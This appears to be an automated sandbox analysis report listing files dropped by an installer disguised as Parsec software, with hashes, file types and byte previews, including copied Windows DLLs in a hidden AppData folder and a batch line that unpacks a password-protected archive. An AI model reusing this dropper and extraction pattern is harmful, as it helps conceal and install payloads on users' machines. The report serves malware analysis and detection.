                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                            C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                            C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.sys (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):1841664
                            Entropy (8bit):6.286587259470902
                            Encrypted:false
                            SSDEEP:24576:E8sHeHKHplfu94i55tbhris2CCEnWaWBvYyozGUIjnRnU:E8Y/Q94iZNrP2t0ZyyIjnRnU
                            MD5:4E35A902CA8ED1C3D4551B1A470C4655
                            SHA1:AD9A9B5DBE810A6D7EA2C8430C32417D87C5930C
                            SHA-256:77222E81CB7004E8C3E077AADA02B555A3D38FB05B50C64AFD36CA230A8FD5B9
                            SHA-512:C7966F892C1F81FBE6A2197BD229904D398A299C53C24586CA77F7F657529323E5A7260ED32DA9701FCE9989B0B9A2463CD45C5A5D77E56A1EA670E02E575A30
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..07.sc7.sc7.scA-.c6.scA-.c<.sc7.rcR.scA-.c.sc!.wb4.scA-.c..sc..pb0.scA-.c6.scA-.c6.scA-.c6.scRich7.sc................PE..d....\.d.........." ................pe....................................................`..........................................-.......$..x................1...............!...................................................................................text...]........................... ..`.rdata...^.......`..................@..@.data........0......."..............@....pdata...1.......2...(..............@..@.rsrc................Z..............@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):557056
                            Entropy (8bit):6.204396774559151
                            Encrypted:false
                            SSDEEP:6144:mE7cV3iwbAFRWAbd4nf0H05yqE6Hl0ChW0+ksllAXBu0lWGWUJJQ4t0BHQQf+L+G:d7a3iwbihym2g7XO3LWUQfh4Co
                            MD5:9A1DD1D96481D61934DCC2D568971D06
                            SHA1:F136EF9BF8BD2FC753292FB5B7CF173A22675FB3
                            SHA-256:8CEBB25E240DB3B6986FCAED6BC0B900FA09DAD763A56FB71273529266C5C525
                            SHA-512:7AC1581F8A29E778BA1A1220670796C47FA5B838417F8F635E2CB1998A01515CFF3EE57045DACB78A8EC70D43754B970743ABA600379FE6D9481958D32D8A5AA
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@...........................................`.....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):120832
                            Entropy (8bit):6.452660436286688
                            Encrypted:false
                            SSDEEP:3072:VUcCdrEZyY755X5YTC81grxQUfZtPrFD:UiyS5JYN1grxQUfZt
                            MD5:267A42F3D8CDF6FCE02BFDA76A724120
                            SHA1:9A17457DAD529419715AC6F092052FF7D1F01469
                            SHA-256:907947FCA16FAB90430F56259EB81EF0609AAAC8166BC174D129945CE78E4A5E
                            SHA-512:64C4D0E54C1D633EF3F7E31B77EA74975FA14A603E1F9590890A9741D23B6430EFC6DD2E8ADF2C0B0E55F8F2B58DF974708A8613198DCB8AD38566B37E579990
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..Eo..Eo..E{..Dc..E{..Dm..Eo..E...E{..D|..E{..Dn..E{..Dw..E{.LEn..E{..Dn..ERicho..E........PE..L....X.Y...........!...............................e................................A.....@A............................).......................................4....F..T...........................(...................|............................text............................... ..`.data...X...........................@....idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):3.3828878559559703
                            Encrypted:false
                            SSDEEP:96:vKiQPIPmWlhsyNcKXWT6w5qNeWhOWwCP:Ci5PmR+eWhOW
                            MD5:E27BB683A96D3C2338FB46385AB7F2FB
                            SHA1:FE4B1A347EE4B9C55D4A53C24C3FFD51F2547CFD
                            SHA-256:9B47A5D829F7045AF99FFD1F6380870BCE47505B41B9CBA88E94C7FC15B8C7E6
                            SHA-512:7EB8E4AF5F53D1C05F04285CAD928D2FB838E2EA7C6BCE261B668EED6C2E5A9E59ACF5213478A007C9C1D79FC291CE1858151B7E92DD6CF0E0EB4E3EF1043F4A
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...}1u............!......................... .....R.........................@............@E............................P............ .......................0..........T............................................................................data...G........................... ..`.rsrc........ ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):356864
                            Entropy (8bit):6.703452536404214
                            Encrypted:false
                            SSDEEP:6144:a/SEW2qJHtVqYEJ6pdMZT6KWm1xA+Mko22Anui5j:kI9tV3EMpdQGRwA+92Uj
                            MD5:7C220C7186368E299FA81FBFF8290064
                            SHA1:F18BB3A1ADF29F8CF556B4D02D44F668537964F6
                            SHA-256:742395A3BBB5700067955BA70E29BE33C45C35A25705A071B472FDBBB1523070
                            SHA-512:48CA2D90714E071357B8CDAE2883633F78964D85ED1C45883794A42F160B754110050E7D5706F7C359448D45F2B8627CF2999D4351302A7073F8D930C101C50B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6@..r!..r!..r!..{Ys..!..fJ.c!..r!.. ..fJ.a!..fJ.x!..fJ.v!..fJ..s!..fJ.[!..fJ..s!..fJ.s!..Richr!..........................PE..L...h>.............!.....|................................................................@A.............................................p...................p..TI.. m..T............................ ..........................@....................text....{.......|.................. ..`.data...T...........................@....idata..^0.......2..................@..@.didat..............................@....rsrc....p.......r..................@..@.reloc..TI...p...J...(..............@..B................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):888832
                            Entropy (8bit):6.658891755289535
                            Encrypted:false
                            SSDEEP:12288:qq+D5IECD3N0TU++ekdhBHUESG+IAafpR2hZz8PC2CQh3Y+EkwVWFvhXX:fECD9j++ekR0JG5AaBmzqhpY+ELUhH
                            MD5:5E7C062BDE54ED88A639A889A1695318
                            SHA1:3A8548093D0E795FBF5E3C972D1EF28CEA76374D
                            SHA-256:318CA8E2AE5ECDBB0A7E10AE90B317C09D9C425758D530FFD54110CE1121088C
                            SHA-512:4609F791DEF263D03FDB57068B626582437E2598BCF77B68456DD2C2C7FE855FF2E71FF555B313BA0E94FADCDC2DC105DA95DC9E566E11369D5C8AF1A98A3A1B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............uH..uH..uH...H..uH..qI..uH..vI..uH..tH..uH..tI..uH..pI..uH..uI..uH..|I:.uH...H..uH..wI..uHRich..uH................PE..L......=...........!.....R...V...............p...........................................@A........................pa..l......X.......P........................... >..T............................>.......................V.......................text....Q.......R.................. ..`.data....(...p.......V..............@....idata...............d..............@..@.didat..`............|..............@....rsrc...P............~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):398336
                            Entropy (8bit):7.1846894828937105
                            Encrypted:false
                            SSDEEP:12288:E15s2/azNQo8oT1EWDEkO6VzZF9uyHLjlHf:o/2CFPkDVzZF9uyHtHf
                            MD5:3FA8077C9C6A769B3BD88800E818BDF6
                            SHA1:7A1E69172E18831FBA28026BE7A24355354713B5
                            SHA-256:1D1FF5C14D8DD0C0F93A2C3DBFC7369E542DEF86C4E4E21659B847C43420C4C3
                            SHA-512:5C4DACFC5D34940F3ABA62A641398ABEA5CA94622EEFD850F902575A43647CB67CFE4091661ACB3710F242FAE2F6FB0E875D679286ABF6C5F38B0CF8572FE1AE
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F.s..s..s......s...w...s...p..s..r.`.s...r..s...v..s...s..s...z...s.....s...q..s.Rich.s.........................PE..L...S;Y............!................@........0...............................P............@A.........................%............... ..X....................0..`... Z..T....................................................$..@....................text............................... ..`.data........0......................@....idata..............................@..@.didat..............................@....rsrc...X.... ......................@..@.reloc..`....0......................@..B................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):264992
                            Entropy (8bit):6.422639874613466
                            Encrypted:false
                            SSDEEP:6144:4i7RSMUw32CszCxRBL17SxvZiPk7H0FsoTVC7Rr:b9p25z+J7v8H0Fso2Rr
                            MD5:5F5E63F6EB6BADA4051AE5B3ADE35C95
                            SHA1:9925C1A5DD98CC0D24F2DB35E75C6FA3512B6BB0
                            SHA-256:5B40BE2B83DE58C9C787D9E97D218EC3CECECEE30CA884CD7A3B45D60A9F2FD9
                            SHA-512:7835DD94B14286FB55EEADCDF1C675C3674A3AE1F94D5A4DB141D9C08E2423EF70DC18C48FFD1EADEB2BFB37D89E435268D80C4E41DA771E0123AC87BBB1C3A0
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4/W.Z|W.Z|W.Z|^..|u.Z|C.^}X.Z|W.[|..Z|C.[}P.Z|C._}U.Z|C.Y}S.Z|C.Z}V.Z|C.S}r.Z|C..|V.Z|C.X}V.Z|RichW.Z|................PE..L..................!.........|...............................................@.......@....@A........................p.......`...........H............... /... .......'..T...............................................\.......`....................text...-........................... ..`.data...0J.......&..................@....idata..............................@..@.didat..............................@....rsrc...H...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):27648
                            Entropy (8bit):5.776086876326118
                            Encrypted:false
                            SSDEEP:768:vpWhWBPbF7QQWWKmk2sBED0U3bjlkZHp9Tw:0hcR7QQ5C3MH+ZHp9s
                            MD5:D2BC6AE376BA560FD67B402E2A97F4CA
                            SHA1:5F6C77A427921A22F6FDFAC4460F44BCC9A89F83
                            SHA-256:41BACE37D18E89539DDA9846AC0AF6ED4733282B01EE99AD735C1638391BF4C3
                            SHA-512:7B5251FCB069AA90DD178AFBB7F405B4737C75ACDFBB28215FBEF1F92F3BC47C24428542C4DB81E2F7E10D865A04FE4A8D404A88D7CE5D491B7D6E1B6F1C95D2
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xr..<.`A<.`A<.`A5k.A*.`A(xe@=.`A(xc@=.`A(xd@).`A(xa@3.`A<.aA..`A(xi@0.`A(x.A=.`A(xb@=.`ARich<.`A................PE..L....@..................D...P......pJ.......`....@..................................j....@...... ..............................@.......................................T...........................x.......................|Q..`....................text...DB.......D.................. ..`.data...H,...`.......H..............@....idata..8............J..............@..@.didat...............Z..............@....rsrc................\..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):3756821
                            Entropy (8bit):7.999950735502969
                            Encrypted:true
                            SSDEEP:49152:SPX5+ecyESLsnN+9/mWfUrkNI7YXv4o4pZ54jEoET6aH2xIuueh26VmQ9FTdPTfQ:SPpLqm/mwUQNI7Zp8xTw6vRPTbSclMj
                            MD5:ADF5C26373A00E49DFC8B59678A26851
                            SHA1:5E0D3E43187E8652FE6B7E898AD666C2939F3C38
                            SHA-256:D009598D6F687532EB734A222D9C0D7EAA179655F736F7A7DD3A2DCB7FAB4AD7
                            SHA-512:ADA9E3C6A9EB49ADCCDC07D30B1A3994C84DE0C9DF93EC365D2396E0C06472C31A6FE2BBA45930DC2B384DC36FFF7D858F1692DCE6DCF57A8543F7F86CA5D70E
                            Malicious:false
                            Preview:7z..'...{T.b.R9.....%.......5b..a..f..B.._Yw"#g...V.y......Q...~..n...n.y..|.W\.$..{...q.w}v.0...1()%"!....b+...Fs..%.......R..1.zp.>G...^.q..Uo..,..1.J..Q..rWUl...@...*.12.7]Z..>>&b...-..........p......./H..<..K+.d.!.3Q$l..."IZ.$.*.6nV....G..[h0....:.`....p.....8ro........w...M.P.../.<....J.Sb...^!.3WH.*.....r*..'..I@..P....P7..{.mG.;....*f.C..?...z_22.N;^.k...$PS-......&.^.......[*y........f.>.....U{k.t# .......`...w.E.hhh......&cX...gIMvd...o_.*.gAeO.X..J..%......f1W...q.n....4..t"....W?...&.S.E..h...*<....:-.. s..R....IY.......))..(.l....F..{. x%..P..I;I.._KKC..$.."......I.q...9sG(..^..P..F..V9=.....tc..4....-......eB.......xY..,.i.Z..&=W.b.).u7DweL W...5c.}...'e..|.qnJs.R.....*......k...u_*....yV.?).s.bg..D.v...@ka....<..D..\U92`.m......R..Qp.h...H..Q..........'..h..!.......a...P.R...-Lk.n.R...A..[..A..PG.@..=...z>."..[k........P.`9.;..N........*..A-..).fH.s1l..w.H3.w...G.p.p|.Q.n..._.9..D2...tC.^o..Q.W.U.^f.....,..A...+.Y].b%.q.....b.^...$

                            C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):172
                            Entropy (8bit):4.910764249781789
                            Encrypted:false
                            SSDEEP:3:I5PUkh4EaKC5ysLvdFnoNUkh4EaKC5yt0RaStYVSQcYQyXWOUkh4EaKC5yH:IN9aZ5lg9aZ5QwhC4xrO9aZ5U
                            MD5:B510879EFB510DCD9E70B03B2ADC20E5
                            SHA1:3DB6E6E439D5A43A49A7AA198C5141557B312458
                            SHA-256:7830EB1EFCD666AB4D38352A730DE7333D5DBDB12FB3F395121942D740A79CBE
                            SHA-512:28D3F783526982F09F11F3B45D557819E7C353B28E4A7957DE97FC418B31CBE66D99CA7DA7C68BA190CD79C17BAADC3E650D19B2605E7EA04AD9DE91726B172D
                            Malicious:false
                            Preview:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"

                            C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.txt

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):20
                            Entropy (8bit):3.8841837197791884
                            Encrypted:false
                            SSDEEP:3:QSM3r9:Hkr9
                            MD5:D2EC38A2F034052124ABC5DE27A0CF08
                            SHA1:198CECE15DDA469855FABACC38041A04626EDA24
                            SHA-256:DCA33C88066644EE5A99AECE0DEE86830AD7811AADDF677E514F4C08AE578CB5
                            SHA-512:7D9859168435276ECDCAFF43906AF949AE9863A11E30D74965E88C64A06D951723DFC1BAD5641474C24FF13079FA7D0142D18B89F88F6FBA7DAC499F1C6D501F
                            Malicious:false
                            Preview:parsec-windows.exe..

                            C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):17408
                            Entropy (8bit):5.099127756403988
                            Encrypted:false
                            SSDEEP:192:lzZ1jWp6XwpkG1ThzQosFRi2gKp8W+YAUtpu1KAgsPzKbMq/YWqB/WcNwGOUf:De9Nhei2gS8W+YAUts1V2oPWqB/WEOU
                            MD5:BE2A0F4DFE1DF0C0A095C05787421510
                            SHA1:521A6F5F4268C0E560075F81760AFED0E22E9C56
                            SHA-256:B46D21E8758624D184A063B2C021AEFFF45CA0C33AECC8840829F16E8E32B43A
                            SHA-512:60955C89F4E56FDA473CF756C04B75B59AFFCF8600380ABA3E12DC41B6E0B370FF04B6320D05FFECBDD7994455796B1CD7DA96BBBCF4948DFE74C3B75974296D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y..m...x..m...u..y..E..m...r..m...x..m...z..m.X.x..m...x..Richy..................PE..L....[*7...........!.................3.......@......................................~n....@A........................ =.......P..x....`..8....................p.......-..T...........................P...@............P...............................text....-.......................... ..`.data........@.......2..............@....idata.......P.......4..............@..@.rsrc...8....`.......:..............@..@.reloc.......p.......@..............@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):21504
                            Entropy (8bit):5.437181553041295
                            Encrypted:false
                            SSDEEP:384:ATE5/wpuI8sgqzptH/b3wGK0LTOefJoJA1FwPWuxWp:NmjppbNlxfJoJALwZe
                            MD5:3417CBAB13CD103B5AEE4D4EF297C240
                            SHA1:2BBBB44DD6592701B749DC352A98DBA7642712F2
                            SHA-256:5BEB57FFFC92BCB5FBD8AFD8B2E09EDAE93E895BB9A4604C010EB377930813AD
                            SHA-512:5A14F422D5E5F292C914D07A083E736B1F33D7CF98C72388F87488C431379FBC70CACB1DC25A97B3887FC35E1E9B7ACF03A9329B355001F7CCAACB0D5CA0F2E3
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;&...G.P.G.P.G.Pv?ZPiG.Pk,.Q~G.Pk,.QrG.P.G.PFG.Pk,.QzG.Pk,.Q|G.Pk,.Q~G.Pk,.Q|G.Pk,6P~G.Pk,.Q~G.PRich.G.P........................PE..L...V.P...........!.....8.......... ........P......................................r.....@A.........................>.......`..........`...............................T...........................p................`.......=..`....................text....7.......8.................. ..`.data........P.......<..............@....idata.......`.......>..............@..@.didat.......p.......H..............@....rsrc...`............J..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):224256
                            Entropy (8bit):6.25795248247157
                            Encrypted:false
                            SSDEEP:6144:5jjuLdC4oe1TV5BwAeK0bT6GkwbQpwsYGGM5:5ja2ev3wAeKAu3OsT5
                            MD5:86C95709715D9EB0ED4BEBC6AF6153C0
                            SHA1:2ED10D1B00C98DB7E265883E03C0A63D422E23B2
                            SHA-256:4A842E92B17A982D98BEEDF5E25B371E2BE3A0D6939A5A256E2B3066D1B53A16
                            SHA-512:180598CA8318CA2DA688740F5BC3C3CB5D684C8E2EAD036E800E77EBF749EBEC50D5D8A76A58166C8A6918D63EDA17DD105A06CAD3FE2AA52EC5E5A80FAF838D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{..y?..*?..*?..*6..*)..*+.+;..*+.+3..*?..*#..*+.+6..*+.+...*+.+#..*+.c*>..*+.a*>..*+.+>..*Rich?..*........PE..L....e..................."...N......0........@....@..................................b....@...... ..........................,S.......p.. .......................h"..P...T............................%...............P..(............................text...x!.......".................. ..`.data........@.......&..............@....idata..2....P.......(..............@..@.rsrc... ....p.......F..............@..@.reloc..h".......$...H..............@..B........................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):88576
                            Entropy (8bit):6.314245127753692
                            Encrypted:false
                            SSDEEP:1536:mw7cep4vTkKL9El0Zsl/0W7f1/D5cigpoFTtOxGtIWo4fv0vwcQ:mLepXKBPW7f1BgmFTt24fKwcQ
                            MD5:EC617981C8A1ECFD4E982DC222D702C4
                            SHA1:08662D14313DF78CD3A62FEDA10673FA61DE93B4
                            SHA-256:8507C144A2C8A734AF66A8BE601B819943F931EF31A5244381DB359AB7714BB1
                            SHA-512:126B30D460DB356AD83C848B18F885032FB7C55483E51D9096BD172839E07FF1063B796BC2E3DFE8596A192AAA9C80D054441F2CAFEBB05F53421CE94F2D6A62
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........OC...C...C...J.W.....W...@...C.......W...F...W...O...W...B...W...N...W..._...W.9.B...W.;.B...W...B...RichC...........PE..L.....I............!..... ...:...... ........0.......................................=....@A........................ /..x...8B..X....p...............................(..T...........................h................@..4....-.......................text............ .................. ..`.data........0.......$..............@....idata.......@.......(..............@..@.didat..$....`.......<..............@....rsrc........p.......>..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):8192
                            Entropy (8bit):3.645665042318358
                            Encrypted:false
                            SSDEEP:96:Orl+urtFDjM60maJGSarulzaYnLakA6wpywK+eXS24eSEWr9wWwMY:Or7bjV3SxzfnLm6wpa5p4qWhwW
                            MD5:29D29296A6532A4964014A3173C91A3A
                            SHA1:0E5CDE29F773F952519EA10DAB24E922962663D7
                            SHA-256:75743713ADAE119D2AFFA85588EECB5415D8975AAF0BE65798CB58FEF1317600
